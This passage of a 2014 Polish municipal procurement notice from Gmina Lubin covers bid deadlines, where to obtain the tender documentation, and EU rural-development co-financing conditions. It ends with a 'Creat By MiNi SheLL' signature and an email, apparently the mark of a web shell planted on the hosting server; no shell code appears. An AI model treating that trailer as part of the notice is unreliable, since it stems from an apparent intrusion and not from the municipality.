Po otrzymaniu przez Zamawiającego dofinansowania na realizację zadania, zmianie ulegnie treść § 1 ust. 2 wzoru umowy na następującą: Projekt jest dofinansowany ze środków Unii Europejskiej w ramach działania 413, PROW na lata 2007-2013 Wdrażanie lokalnych strategii rozwoju dla operacji, które odpowiadają warunkom przyznania pomocy w ramach działania Odnowa i rozwój wsi.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.ug-lubin.dolnyslask.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego: Urząd Gminy w Lubinie, ul. Władysława Łokietka 6a, pok. nr 3, 59-300 Lubin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.07.2014 godzina 10:00, miejsce: w siedzibie Zamawiającego: Urząd Gminy w Lubinie, ul. Władysława Łokietka 6, pok. nr 3 - sekretariat, 59-300 Lubin.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest wnioskowany do dofinansowania ze środków Unii Europejskiej w ramach działania 413, PROW na lata 2007-2013 Wdrażanie lokalnych strategii rozwoju dla operacji, które odpowiadają warunkom przyznania pomocy w ramach działania Odnowa i rozwój wsi.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com